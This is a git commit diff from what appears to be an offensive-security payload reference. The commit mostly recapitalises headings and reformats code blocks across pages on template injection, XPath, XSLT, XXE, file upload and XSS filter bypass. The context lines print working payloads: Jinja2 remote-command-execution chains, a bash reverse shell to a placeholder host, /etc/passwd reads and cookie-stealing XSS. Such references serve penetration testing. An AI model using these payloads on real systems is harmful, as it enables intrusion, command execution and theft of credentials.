XPATH + XSS + XXE + XSLT

2024-12-04 02:20:17 +00:00 · 2024-11-30 21:14:51 +01:00 · 2024-11-30 21:14:51 +01:00 · 32d9f7550d
commit 32d9f7550d
parent 8c09568cb2
15 changed files with 235 additions and 201 deletions
--- a/Injection/Cassandra
+++ b/Injection/Cassandra
@ -6,8 +6,8 @@
 ## Summary

 * [CQL Injection Limitations](#cql-injection-limitations)
-* [Cassandra comment](#cassandra-comment)
-* [Cassandra - Login Bypass](#cassandra---login-bypass)
+* [Cassandra Comment](#cassandra-comment)
+* [Cassandra Login Bypass](#cassandra-login-bypass)
    * [Example #1](#example-1)
    * [Example #2](#example-2)
 * [References](#references) 
@ -26,14 +26,14 @@
 * CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected. 


-## Cassandra comment
+## Cassandra Comment

 ```sql
 /* Cassandra Comment */
 ```


-## Cassandra - Login Bypass
+## Cassandra Login Bypass

 ### Example #1

--- a/Injection/DB2
+++ b/Injection/DB2
@ -54,7 +54,6 @@

 ## DB2 Methodology

-
 | Description      | SQL Query |
 | ---------------- | ------------------------------------ |
 | List databases   | `SELECT distinct(table_catalog) FROM sysibm.tables` |
--- a/Injection/ASP.md
+++ b/Injection/ASP.md
@ -6,8 +6,8 @@
 ## Summary

 - [ASP.NET Razor](#aspnet-razor)
-    - [ASP.NET Razor - Basic injection](#aspnet-razor---basic-injection)
-    - [ASP.NET Razor - Command execution](#aspnet-razor---command-execution)
+    - [ASP.NET Razor - Basic Injection](#aspnet-razor---basic-injection)
+    - [ASP.NET Razor - Command Execution](#aspnet-razor---command-execution)
 - [References](#references)


@ -18,13 +18,13 @@
 > Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages.


-### ASP.NET Razor - Basic injection
+### ASP.NET Razor - Basic Injection

 ```powershell
@(1+2)
 ```

-### ASP.NET Razor - Command execution
+### ASP.NET Razor - Command Execution

 ```csharp
@{
--- a/Injection/PHP.md
+++ b/Injection/PHP.md
@ -8,13 +8,13 @@
 - [Templating Libraries](#templating-libraries)
 - [Smarty](#smarty)
 - [Twig](#twig)
-    - [Twig - Basic injection](#twig---basic-injection)
-    - [Twig - Template format](#twig---template-format)
+    - [Twig - Basic Injection](#twig---basic-injection)
+    - [Twig - Template Format](#twig---template-format)
    - [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading)
-    - [Twig - Code execution](#twig---code-execution)
+    - [Twig - Code Execution](#twig---code-execution)
 - [Latte](#latte)
-    - [Latte - Basic injection](#latte---basic-injection)
-    - [Latte - Code execution](#latte---code-execution)
+    - [Latte - Basic Injection](#latte---basic-injection)
+    - [Latte - Code Execution](#latte---code-execution)
 - [patTemplate](#pattemplate)
 - [PHPlib](#phplib-and-html_template_phplib)
 - [Plates](#plates)
@ -53,7 +53,7 @@
 [Official website](https://twig.symfony.com/)
 > Twig is a modern template engine for PHP.

-### Twig - Basic injection
+### Twig - Basic Injection

 ```python
 {{7*7}}
@ -63,7 +63,7 @@
 {{app.request.server.all|join(',')}}
 ```

-### Twig - Template format
+### Twig - Template Format

 ```python
 $output = $twig > render (
@ -84,7 +84,7 @@ $output = $twig > render (
 {{include("wp-config.php")}}
 ```

-### Twig - Code execution
+### Twig - Code Execution

 ```python
 {{self}}
@ -118,13 +118,13 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld

 ## Latte

-### Latte - Basic injection
+### Latte - Basic Injection

 ```php
 {var $X="POC"}{$X}
 ```

-### Latte - Code execution
+### Latte - Code Execution

 ```php
 {php system('nslookup oastify.com')}
--- a/Injection/Python.md
+++ b/Injection/Python.md
@ -7,29 +7,29 @@

 - [Templating Libraries](#templating-libraries)
 - [Django](#django)
-    - [Django - Basic injection](#django---basic-injection)
-    - [Django - Cross-site scripting](#django---cross-site-scripting)
-    - [Django - Debug information leak](#django---debug-information-leak)
-    - [Django - Leaking app's Secret Key](#django---leaking-apps-secret-key)
+    - [Django - Basic Injection](#django---basic-injection)
+    - [Django - Cross-Site Scripting](#django---cross-site-scripting)
+    - [Django - Debug Information Leak](#django---debug-information-leak)
+    - [Django - Leaking App's Secret Key](#django---leaking-apps-secret-key)
    - [Django - Admin Site URL leak](#django---admin-site-url-leak)
-    - [Django - Admin username and password hash leak](#django---admin-username-and-password-hash-leak)
+    - [Django - Admin Username and Password Hash Leak](#django---admin-username-and-password-hash-leak)
 - [Jinja2](#jinja2)
-    - [Jinja2 - Basic injection](#jinja2---basic-injection)
-    - [Jinja2 - Template format](#jinja2---template-format)
+    - [Jinja2 - Basic Injection](#jinja2---basic-injection)
+    - [Jinja2 - Template Format](#jinja2---template-format)
    - [Jinja2 - Debug Statement](#jinja2---debug-statement)
-    - [Jinja2 - Dump all used classes](#jinja2---dump-all-used-classes)
-    - [Jinja2 - Dump all config variables](#jinja2---dump-all-config-variables)
-    - [Jinja2 - Read remote file](#jinja2---read-remote-file)
-    - [Jinja2 - Write into remote file](#jinja2---write-into-remote-file)
+    - [Jinja2 - Dump All Used Classes](#jinja2---dump-all-used-classes)
+    - [Jinja2 - Dump All Config Variables](#jinja2---dump-all-config-variables)
+    - [Jinja2 - Read Remote File](#jinja2---read-remote-file)
+    - [Jinja2 - Write Into Remote File](#jinja2---write-into-remote-file)
    - [Jinja2 - Remote Command Execution](#jinja2---remote-command-execution)
-        - [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce)
-        - [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
-        - [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
-        - [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
-        - [Exploit the SSTI by writing an evil config file.](#exploit-the-ssti-by-writing-an-evil-config-file)
-    - [Jinja2 - Filter bypass](#jinja2---filter-bypass)
+        - [Forcing Output On Blind RCE](#jinja2---forcing-output-on-blind-rce)
+        - [Exploit The SSTI By Calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
+        - [Exploit The SSTI By Calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
+        - [Exploit The SSTI By Calling Popen Without Guessing The Offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
+        - [Exploit The SSTI By Writing an Evil Config File](#exploit-the-ssti-by-writing-an-evil-config-file)
+    - [Jinja2 - Filter Bypass](#jinja2---filter-bypass)
 - [Tornado](#tornado)
-    - [Tornado - Basic injection](#tornado---basic-injection)
+    - [Tornado - Basic Injection](#tornado---basic-injection)
    - [Tornado - Remote Command Execution](#tornado---remote-command-execution)    
 - [Mako](#mako)
    - [Mako - Remote Command Execution](#mako---remote-command-execution)
@ -54,7 +54,7 @@

 Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2.

-### Django - Basic injection
+### Django - Basic Injection

 ```python
 {% csrf_token %} # Causes error with Jinja2
@ -63,20 +63,20 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
 ```


-### Django - Cross-site scripting
+### Django - Cross-Site Scripting

 ```python
 {{ '<script>alert(3)</script>' }}
 {{ '<script>alert(3)</script>' | safe }}
 ```

-### Django - Debug information leak
+### Django - Debug Information Leak

 ```python
 {% debug %}
 ```

-### Django - Leaking app’s Secret Key
+### Django - Leaking App's Secret Key

 ```python
 {{ messages.storages.0.signer.key }}
@ -89,7 +89,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
 {% include 'admin/base.html' %}
 ```

-### Django - Admin username and password hash leak
+### Django - Admin Username And Password Hash Leak


 ```
@ -104,7 +104,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
 [Official website](https://jinja.palletsprojects.com/)
 > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.  

-### Jinja2 - Basic injection
+### Jinja2 - Basic Injection

 ```python
 {{4*4}}[[5*5]]
@ -115,7 +115,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
 Jinja2 is used by Python Web Frameworks such as Django or Flask.
 The above injections have been tested on a Flask application.

-### Jinja2 - Template format
+### Jinja2 - Template Format

 ```python
 {% extends "layout.html" %}
@ -139,7 +139,7 @@ If the Debug Extension is enabled, a `{% debug %}` tag will be available to dump

 Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement

-### Jinja2 - Dump all used classes
+### Jinja2 - Dump All Used Classes

 ```python
 {{ [].class.base.subclasses() }}
@ -153,7 +153,7 @@ Access `__globals__` and `__builtins__`:
 {{ self.__init__.__globals__.__builtins__ }}
 ```

-### Jinja2 - Dump all config variables
+### Jinja2 - Dump All Config Variables

 ```python
 {% for key, value in config.iteritems() %}
@ -162,7 +162,7 @@ Access `__globals__` and `__builtins__`:
 {% endfor %}
 ```

-### Jinja2 - Read remote file
+### Jinja2 - Read Remote File

 ```python
 # ''.__class__.__mro__[2].__subclasses__()[40] = File class
@ -172,7 +172,7 @@ Access `__globals__` and `__builtins__`:
 {{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
 ```

-### Jinja2 - Write into remote file
+### Jinja2 - Write Into Remote File

 ```python
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
@ -186,7 +186,7 @@ Listen for connection
 nc -lnvp 8000
 ```

-#### Jinja2 - Forcing output on blind RCE
+#### Jinja2 - Forcing Output On Blind RCE

 You can import Flask functions to return an output from the vulnerable page.

@ -203,7 +203,7 @@ def hook(*args, **kwargs):
 ```


-#### Exploit the SSTI by calling os.popen().read()
+#### Exploit The SSTI By Calling os.popen().read()

 ```python
 {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
@ -235,7 +235,7 @@ With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a pa

 Source: https://twitter.com/podalirius_/status/1655970628648697860

-#### Exploit the SSTI by calling subprocess.Popen
+#### Exploit The SSTI By Calling subprocess.Popen

 :warning: the number 396 will vary depending of the application.

@ -244,7 +244,7 @@ Source: https://twitter.com/podalirius_/status/1655970628648697860
 {{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
 ```

-#### Exploit the SSTI by calling Popen without guessing the offset
+#### Exploit The SSTI By Calling Popen Without Guessing The Offset

 ```python
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
@ -257,7 +257,7 @@ In another GET parameter include a variable named "input" that contains the comm
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
 ```

-#### Exploit the SSTI by writing an evil config file.
+#### Exploit The SSTI By Writing An Evil Config File

 ```python
 # evil config
@ -270,7 +270,7 @@ In another GET parameter include a variable named "input" that contains the comm
 {{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
 ```

-### Jinja2 - Filter bypass
+### Jinja2 - Filter Bypass

 ```python
 request.__class__
@ -313,7 +313,7 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http

 ## Tornado

-### Tornado - Basic injection
+### Tornado - Basic Injection

 ```py
 {{7*7}}
--- a/Juggling/README.md
+++ b/Juggling/README.md
@ -6,8 +6,8 @@
 ## Summary

 * [Loose Comparison](#loose-comparison)
-	* [True statements](#true-statements)
-	* [NULL statements](#null-statements)
+	* [True Statements](#true-statements)
+	* [NULL Statements](#null-statements)
 	* [Loose Comparison](#loose-comparison)
 * [Magic Hashes](#magic-hashes)
 * [Methodology](#methodology)
@ -22,7 +22,7 @@
 - **Loose** comparison: using `== or !=` : both variables have "the same value".
 - **Strict** comparison: using `=== or !==` : both variables have "the same type and the same value".

-### True statements
+### True Statements

 | Statement                         | Output |
 | --------------------------------- |:---------------:|
@ -44,7 +44,7 @@

 ![LooseTypeComparison](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/Images/table_representing_behavior_of_PHP_with_loose_type_comparisons.png?raw=true)

-Loose Type Comparisons occurs in many languages:
+Loose Type comparisons occurs in many languages:

 * [MariaDB](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mariadb)
 * [MySQL](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mysql)
@ -56,7 +56,7 @@ Loose Type Comparisons occurs in many languages:
 * [SQLite](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/SQLite/2.6.0)


-### NULL statements
+### NULL Statements

 | Function | Statement                  | Output |
 | -------- | -------------------------- |:---------------:|
--- a/Files/README.md
+++ b/Files/README.md
@ -7,10 +7,10 @@

 * [Tools](#tools)
 * [Methodology](#methodology)
-    * [Defaults extensions](#defaults-extensions)
-    * [Upload tricks](#upload-tricks)
-    * [Filename vulnerabilities](#filename-vulnerabilities)
-    * [Picture compression](#picture-compression)
+    * [Defaults Extensions](#defaults-extensions)
+    * [Upload Tricks](#upload-tricks)
+    * [Filename Vulnerabilities](#filename-vulnerabilities)
+    * [Picture Compression](#picture-compression)
    * [Picture Metadata](#picture-metadata)
    * [Configuration Files](#configuration-files)
    * [CVE - ImageMagick](#cve---imagemagick)
@ -30,7 +30,7 @@

 ![file-upload-mindmap.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Upload%20Insecure%20Files/Images/file-upload-mindmap.png?raw=true)

-### Defaults extensions
+### Defaults Extensions

 * PHP Server
    ```powershell
@ -64,7 +64,7 @@
 * Coldfusion: `.cfm, .cfml, .cfc, .dbm`
 * Node.js: `.js, .json, .node`

-### Upload tricks
+### Upload Tricks

 - Use double extensions : `.jpg.php, .png.php5`
 - Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg`
@ -99,7 +99,7 @@
    * Shell can also be added in the metadata
 - Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character ":" will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. "`file.asax:.jpg`"). This file might be edited later using other techniques such as using its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "`file.asp::$data.`")

-### Filename vulnerabilities
+### Filename Vulnerabilities

 Sometimes the vulnerability is not the upload but how the file is handled after. You might want to upload files with payloads in the filename.

--- a/Deception/README.md
+++ b/Deception/README.md
@ -33,6 +33,7 @@ Imagine an attacker lures a logged-in victim into accessing `http://www.example.
 6. The cache server identifies that the file has a CSS extension. 
 7. Under the cache directory, the cache server creates a directory named home.php and caches the imposter "CSS" file (non-existent.css) inside it. 
 8. When the attacker requests `http://www.example.com/home.php/non-existent.css`, the request is sent to the cache server, and the cache server returns the cached file with the victim's sensitive `home.php` data.
+
 ![WCD Demonstration](Images/wcd.jpg)


@ -88,9 +89,9 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page

 The following URL format are a good starting point to check for "cache" feature.

-* https://example.com/app/conversation/.js?test
-* https://example.com/app/conversation/;.js
-* https://example.com/home.php/non-existent.css
+* `https://example.com/app/conversation/.js?test`
+* `https://example.com/app/conversation/;.js`
+* `https://example.com/home.php/non-existent.css`


 ## CloudFlare Caching
--- a/Injection/README.md
+++ b/Injection/README.md
@ -7,7 +7,7 @@

 * [Tools](#tools)
 * [Methodology](#methodology)
-    * [Blind exploitation](#blind-exploitation)
+    * [Blind Exploitation](#blind-exploitation)
    * [Out Of Band Exploitation](#out-of-band-exploitation)
 * [Labs](#labs)
 * [References](#references)
@ -23,7 +23,11 @@

 ## Methodology

-Similar to SQL : `"string(//user[name/text()='" +vuln_var1+ "' and password/text()=’" +vuln_var1+ "']/account/text())"`
+Similar to SQL injection, you want to terminate the query properly: 
+
+```ps1
+string(//user[name/text()='" +vuln_var1+ "' and password/text()='" +vuln_var1+ "']/account/text())
+```

 ```sql
 ' or '1'='1
@ -39,9 +43,9 @@ x' or name()='username' or 'x'='y
 ' and count(/*)=1 and '1'='1
 ' and count(/@*)=1 and '1'='1
 ' and count(/comment())=1 and '1'='1
-search=')] | //user/*[contains(*,'
-search=Har') and contains(../password,'c
-search=Har') and starts-with(../password,'c
+')] | //user/*[contains(*,'
+') and contains(../password,'c
+') and starts-with(../password,'c
 ```

 ### Blind Exploitation
@ -50,7 +54,8 @@ search=Har') and starts-with(../password,'c
    ```sql
    and string-length(account)=SIZE_INT
    ```
-2. Extract a character
+
+2. Access a character with `substring`, and verify its value the `codepoints-to-string` function
    ```sql
    substring(//user[userid=5]/username,2,1)=CHAR_HERE
    substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
--- a/Injection/README.md
+++ b/Injection/README.md
@ -7,11 +7,11 @@

 - [Tools](#tools)
 - [Methodology](#methodology)
-    - [Determine the vendor and version](#determine-the-vendor-and-version)
+    - [Determine the Vendor And Version](#determine-the-vendor-and-version)
    - [External Entity](#external-entity)
-    - [Read files and SSRF using document](#read-files-and-ssrf-using-document)
-    - [Write files with EXSLT extension](#write-files-with-exslt-extension)
-    - [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper)
+    - [Read Files and SSRF Using Document](#read-files-and-ssrf-using-document)
+    - [Write Files with EXSLT Extension](#write-files-with-exslt-extension)
+    - [Remote Code Execution with PHP Wrapper](#remote-code-execution-with-php-wrapper)
    - [Remote Code Execution with Java](#remote-code-execution-with-java)
    - [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
 - [Labs](#labs)
@ -22,12 +22,10 @@

 No known tools currently exist to assist with XSLT exploitation.

-* [TODO](#)
-

 ## Methodology

-### Determine the vendor and version
+### Determine the Vendor and Version

 ```xml
 <?xml version="1.0" encoding="utf-8"?>
@ -51,6 +49,8 @@ No known tools currently exist to assist with XSLT exploitation.

 ### External Entity

+Don't forget to test for XXE when you encounter XSLT files.
+
 ```xml
 <?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "C:\secretfruit.txt">]>
@ -66,7 +66,7 @@ No known tools currently exist to assist with XSLT exploitation.
 </xsl:stylesheet>
 ```

-### Read files and SSRF using document
+### Read Files and SSRF Using Document

 ```xml
 <?xml version="1.0" encoding="utf-8"?>
@ -86,7 +86,7 @@ No known tools currently exist to assist with XSLT exploitation.
 ```


-### Write files with EXSLT extension
+### Write Files with EXSLT Extension

 EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language. EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language. 

@ -106,7 +106,7 @@ EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions
 ```


-### Remote Code Execution with PHP wrapper
+### Remote Code Execution with PHP Wrapper

 Execute the function `readfile`.

--- a/Injection/1
+++ b/Injection/1
@ -2,28 +2,29 @@

 ## Summary

- [Bypass case sensitive](#bypass-case-sensitive)
- [Bypass tag blacklist](#bypass-tag-blacklist)
- [Bypass word blacklist with code evaluation](#bypass-word-blacklist-with-code-evaluation)
- [Bypass with incomplete html tag](#bypass-with-incomplete-html-tag)
- [Bypass quotes for string](#bypass-quotes-for-string)
- [Bypass quotes in script tag](#bypass-quotes-in-script-tag)
- [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event)
- [Bypass dot filter](#bypass-dot-filter)
- [Bypass parenthesis for string](#bypass-parenthesis-for-string)
- [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon)
- [Bypass onxxxx= blacklist](#bypass-onxxxx-blacklist)
- [Bypass space filter](#bypass-space-filter)
- [Bypass email filter](#bypass-email-filter)
- [Bypass document blacklist](#bypass-document-blacklist)
- [Bypass document.cookie blacklist](#bypass-document-cookie-blacklist)
- [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string)
- [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect)
- [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert)
- [Bypass ">" using nothing](#bypass--using-nothing)
+- [Bypass Case Sensitive](#bypass-case-sensitive)
+- [Bypass Tag Blacklist](#bypass-tag-blacklist)
+- [Bypass Word Blacklist with Code Evaluation](#bypass-word-blacklist-with-code-evaluation)
+- [Bypass with Incomplete HTML Tag](#bypass-with-incomplete-html-tag)
+- [Bypass Quotes for String](#bypass-quotes-for-string)
+- [Bypass Quotes in Script Tag](#bypass-quotes-in-script-tag)
+- [Bypass Quotes in Mousedown Event](#bypass-quotes-in-mousedown-event)
+- [Bypass Dot Filter](#bypass-dot-filter)
+- [Bypass Parenthesis for String](#bypass-parenthesis-for-string)
+- [Bypass Parenthesis and Semi Colon](#bypass-parenthesis-and-semi-colon)
+- [Bypass onxxxx= Blacklist](#bypass-onxxxx-blacklist)
+- [Bypass Space Filter](#bypass-space-filter)
+- [Bypass Email Filter](#bypass-email-filter)
+- [Bypass Tel URI Filter](#bypass-tel-uri-filter)
+- [Bypass document Blacklist](#bypass-document-blacklist)
+- [Bypass document.cookie Blacklist](#bypass-document-cookie-blacklist)
+- [Bypass using Javascript Inside a String](#bypass-using-javascript-inside-a-string)
+- [Bypass using an Alternate Way to Redirect](#bypass-using-an-alternate-way-to-redirect)
+- [Bypass using an Alternate Way to Execute an Alert](#bypass-using-an-alternate-way-to-execute-an-alert)
+- [Bypass ">" using Nothing](#bypass--using-nothing)
 - [Bypass "<" and ">" using ＜ and ＞](#bypass--and--using--and-)
- [Bypass ";" using another character](#bypass--using-another-character)
- [Bypass using missing charset header](#bypass-using-missing-charset-header)
+- [Bypass ";" using Another Character](#bypass--using-another-character)
+- [Bypass using Missing Charset Header](#bypass-using-missing-charset-header)
 - [Bypass using HTML encoding](#bypass-using-html-encoding)
 - [Bypass using Katakana](#bypass-using-katakana)
 - [Bypass using Cuneiform](#bypass-using-cuneiform)
@ -36,11 +37,11 @@
 - [Bypass using UTF-16be](#bypass-using-utf-16be)
 - [Bypass using UTF-32](#bypass-using-utf-32)
 - [Bypass using BOM](#bypass-using-bom)
- [Bypass using jsfuck](#bypass-using-jsfuck)
+- [Bypass using JSfuck](#bypass-using-jsfuck)
 - [References](#references)


-## Bypass case sensitive
+## Bypass Case Sensitive

 To bypass a case-sensitive XSS filter, you can try mixing uppercase and lowercase letters within the tags or function names.

@ -52,14 +53,14 @@ To bypass a case-sensitive XSS filter, you can try mixing uppercase and lowercas
 Since many XSS filters only recognize exact lowercase or uppercase patterns, this can sometimes evade detection by tricking simple case-sensitive filters.


-## Bypass tag blacklist
+## Bypass Tag Blacklist

 ```javascript
 <script x>
 <script x>alert('XSS')<script y>
 ```

-## Bypass word blacklist with code evaluation
+## Bypass Word Blacklist with Code Evaluation

 ```javascript
 eval('ale'+'rt(0)');
@ -71,7 +72,7 @@ Set.constructor('ale'+'rt(13)')();
 Set.constructor`al\x65rt\x2814\x29```;
 ```

-## Bypass with incomplete html tag
+## Bypass with Incomplete HTML Tag

 Works on IE/Firefox/Chrome/Safari

@ -79,13 +80,13 @@ Works on IE/Firefox/Chrome/Safari
 <img src='1' onerror='alert(0)' <
 ```

-## Bypass quotes for string
+## Bypass Quotes for String

 ```javascript
 String.fromCharCode(88,83,83)
 ```

-## Bypass quotes in script tag
+## Bypass Quotes in Script Tag

 ```javascript
 http://localhost/bla.php?test=</script><script>alert(1)</script>
@ -96,7 +97,7 @@ http://localhost/bla.php?test=</script><script>alert(1)</script>
 </html>
 ```

-## Bypass quotes in mousedown event
+## Bypass Quotes in Mousedown Event

 You can bypass a single quote with &#39; in an on mousedown event handler

@ -104,7 +105,7 @@ You can bypass a single quote with &#39; in an on mousedown event handler
 <a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
 ```

-## Bypass dot filter
+## Bypass Dot Filter

 ```javascript
 <script>window['alert'](document['domain'])</script>
@ -119,60 +120,74 @@ http://www.geektools.com/cgi-bin/ipconv.cgi

 Base64 encoding your XSS payload with Linux command: IE. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==`

-## Bypass parenthesis for string
+## Bypass Parenthesis for String

 ```javascript
 alert`1`
 setTimeout`alert\u0028document.domain\u0029`;
 ```

-## Bypass parenthesis and semi colon
+## Bypass Parenthesis and Semi Colon

-```javascript
-// From @garethheyes
-<script>onerror=alert;throw 1337</script>
-<script>{onerror=alert}throw 1337</script>
-<script>throw onerror=alert,'some string',123,'haha'</script>
+* From @garethheyes
+    ```javascript
+    <script>onerror=alert;throw 1337</script>
+    <script>{onerror=alert}throw 1337</script>
+    <script>throw onerror=alert,'some string',123,'haha'</script>
+    ```

-// From @terjanq
-<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
+* From @terjanq
+    ```js
+    <script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
+    ```

-// From @cgvwzq
-<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
-```
+* From @cgvwzq
+    ```js
+    <script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
+    ```

-## Bypass onxxxx= blacklist
+## Bypass onxxxx Blacklist

-```javascript
-<object onafterscriptexecute=confirm(0)>
-<object onbeforescriptexecute=confirm(0)>
+* Use less known tag
+    ```html
+    <object onafterscriptexecute=confirm(0)>
+    <object onbeforescriptexecute=confirm(0)>
+    ```

-// Bypass onxxx= filter with a null byte/vertical tab/Carriage Return/Line Feed
-<img src='1' onerror\x00=alert(0) />
-<img src='1' onerror\x0b=alert(0) />
-<img src='1' onerror\x0d=alert(0) />
-<img src='1' onerror\x0a=alert(0) />
+* Bypass onxxx= filter with a null byte/vertical tab/Carriage Return/Line Feed
+    ```html
+    <img src='1' onerror\x00=alert(0) />
+    <img src='1' onerror\x0b=alert(0) />
+    <img src='1' onerror\x0d=alert(0) />
+    <img src='1' onerror\x0a=alert(0) />
+    ```

-// Bypass onxxx= filter with a '/'
-<img src='1' onerror/=alert(0) />
-```
+* Bypass onxxx= filter with a '/'
+    ```js
+    <img src='1' onerror/=alert(0) />
+    ```

-## Bypass space filter

-```javascript
-// Bypass space filter with "/"
-<img/src='1'/onerror=alert(0)>
+## Bypass Space Filter

-// Bypass space filter with 0x0c/^L or 0x0d/^M or 0x0a/^J or 0x09/^I
-<svgonload=alert(1)>
+* Bypass space filter with "/"
+    ```javascript
+    <img/src='1'/onerror=alert(0)>
+    ```

+* Bypass space filter with `0x0c/^L` or `0x0d/^M` or `0x0a/^J` or `0x09/^I`
+  ```html
+  <svgonload=alert(1)>
+  ```
+
+```ps1
 $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
 00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c  <svg.onload.=.al
 00000010: 6572 7428 3129 0c3e 0a                   ert(1).>.
 ```


-## Bypass email filter
+## Bypass Email Filter

 * [RFC0822 compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)
  ```javascript
@ -185,7 +200,7 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
  ```


-## Bypass tel URI filter
+## Bypass Tel URI Filter

 At least 2 RFC mention the `;phone-context=` descriptor:

@ -197,22 +212,22 @@ At least 2 RFC mention the `;phone-context=` descriptor:
 ```


-## Bypass document blacklist
+## Bypass Document Blacklist

 ```javascript
 <div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
 window["doc"+"ument"]
 ```

-## Bypass document.cookie blacklist
+## Bypass document.cookie Blacklist

 This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements.

-```
+```js
 window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);});
 ```

-## Bypass using javascript inside a string
+## Bypass using Javascript Inside a String

 ```javascript
 <script>
@ -220,7 +235,7 @@ foo="text </script><script>alert(1)</script>";
 </script>
 ```

-## Bypass using an alternate way to redirect
+## Bypass using an Alternate Way to Redirect

 ```javascript
 location="http://google.com"
@ -230,7 +245,7 @@ window.location.assign("http://google.com")
 window['location']['href']="http://google.com"
 ```

-## Bypass using an alternate way to execute an alert
+## Bypass using an Alternate Way to Execute an Alert

 From [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) tweet.

@ -271,14 +286,15 @@ self[Object.keys(self)[5]]("1") // alert("1")
 We can find "alert" with a regular expression like ^a[rel]+t$ :

 ```javascript
-a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a()
+//bind function alert on new function a()
+a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} 

 // then you can use a() with Object.keys
-
 self[Object.keys(self)[a()]]("1") // alert("1")
 ```

 Oneliner:
+
 ```javascript
 a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1")
 ```
